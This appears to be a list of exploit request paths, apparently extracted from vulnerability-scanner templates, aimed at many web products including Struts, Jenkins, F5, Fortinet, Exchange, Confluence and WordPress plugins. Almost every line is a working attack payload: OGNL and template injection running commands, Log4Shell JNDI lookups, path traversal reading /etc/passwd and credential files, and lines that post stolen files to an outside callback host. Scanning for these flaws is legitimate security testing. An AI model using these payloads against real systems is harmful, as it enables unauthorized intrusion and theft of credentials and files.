/cgi-bin/status
/cgi-bin/stats
/cgi-bin/test
/cgi-bin/status/status.cgi
/test.cgi
/debug.cgi
/cgi-bin/test-cgi
/?search==%00{.cookie|{{str1}}|value%3d{{str2}}.}
/integration/saveGangster.action
/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;
/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData
/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/
/cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username=
/vpn/../vpns/cfg/smb.conf
/cgi-bin/file_transfer.cgi
/api/timelion/run
/web.config.i18n.ashx?l={{string}}&v={{string}}
/SWNetPerfMon.db.i18n.ashx?l={{string}}&v={{string}}
/api/experimental/latest_runs
/console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(
/run
/?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D
/console/login/LoginForm.jsp
/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
/hsqldb%0a
/cgi-bin/weblogin.cgi?username=admin
/ui/vropspluginui/rest/services/getstatus
/users/sign_in
/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;
/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
/openam/oauth2/..;/ccversion/Version
/oam/server/opensso/sessionservice
/?unix:{{repeat(
/RestAPI/ImportTechnicians
/ddns_check.ccp
/userportal/Controller?mode=8700&operation=1&datagrid=179&json={\
/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d
/zabbix/index_sso.php
/index_sso.php
/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/
/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/
/photo/combine.php?type=javascript&g=core-r7rules/../../../hello.php.
/js/zimbraMail/share/model/ZmSettings.js
/forms/doLogin?login_username=admin&password=password$(curl%20{{interactsh-url}})&x=0&y=0
/mifs/aad/api/v2/admins/users
/c42api/v3/LoginConfiguration?username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&url=https://localhost
/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow
/secure/ContactAdministrators!default.jspa
/web.config.i18n.ashx?l=nuclei&v=nuclei
/SWNetPerfMon.db.i18n.ashx?l=nuclei&v=nuclei
/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E
/?class.module.classLoader.resources.context.configFile=https://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx
/api/geojson?url=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}
/user/error
/dr/authentication/oauth2/oauth2login?error=%24%7Bjndi%3Aldap%3A%2F%2F%24%7BhostName%7D.{{interactsh-url}}%7D
/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en
/login/../../../etc/passwd
/cgi-bin/;cat$IFS/etc/passwd
/poc.jsp/
/poc.jsp?cmd=cat+%2Fetc%2Fpasswd
/passwordrecovered.cgi?id={{rand_base(5)}}
/struts2-rest-showcase/orders/3
/orders/3
/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions
/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action
/cgi-bin/config.exp
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini
/node/1?_format=hal_json
/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php
/analytics/saw.dll?bieehome&startPage=1
/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd
/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development
/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20{{interactsh-url}})
/api/snapshots/:key
/module/api.php?mobile/webNasIPS
/doAs?=`{{url_encode(
/autodiscover/autodiscover.json/v1.0/aa@{{Host}}?Protocol=Autodiscoverv1
/autodiscover/autodiscover.json/v1.0/aa..{{Host}}/owa/?&Email=autodiscover/autodiscover.json?a..{{Host}}&Protocol=Autodiscoverv1&Protocol=Powershell
/autodiscover/autodiscover.json/v1.0/aa@{{Host}}/owa/?&Email=autodiscover/autodiscover.json?a@{{Host}}&Protocol=Autodiscoverv1&Protocol=Powershell
/autodiscover/autodiscover.json?aa..{{Host}}/owa/?&Email=autodiscover/autodiscover.json?a..{{Host}}&Protocol=Autodiscoverv1&{{Host}}Protocol=Powershell
/autodiscover/autodiscover.json?aa@{{Host}}/owa/?&Email=autodiscover/autodiscover.json?a@{{Host}}&Protocol=Autodiscoverv1&{{Host}}Protocol=Powershell
/autodiscover/autodiscover.json?aa..{{Host}}/owa/?&Email=aa@autodiscover/autodiscover.json?a..{{Host}}&Protocol=Autodiscoverv1&{{Host}}Protocol=Powershell
/autodiscover/autodiscover.json?aa@{{Host}}/owa/?&Email=aa@autodiscover/autodiscover.json?a@{{Host}}&Protocol=Autodiscoverv1&{{Host}}Protocol=Powershell
/autodiscover/autodiscover.json/v1.0/aa@autodiscover/autodiscover.json?a..@{{Host}}&Protocol=Autodiscoverv1&Protocol=Powershell
/autodiscover/autodiscover.json?@{{Host}}/&Email=autodiscover/autodiscover.json%3f@{{Host}}
/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{T(java.net.InetAddress).getByName(
//CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx
/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx
/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties
/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://{{interactsh-url}}
/s/{{randstr}}/_/;/WEB-INF/web.xml
/zabbix/setup.php
/setup.php
/public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E
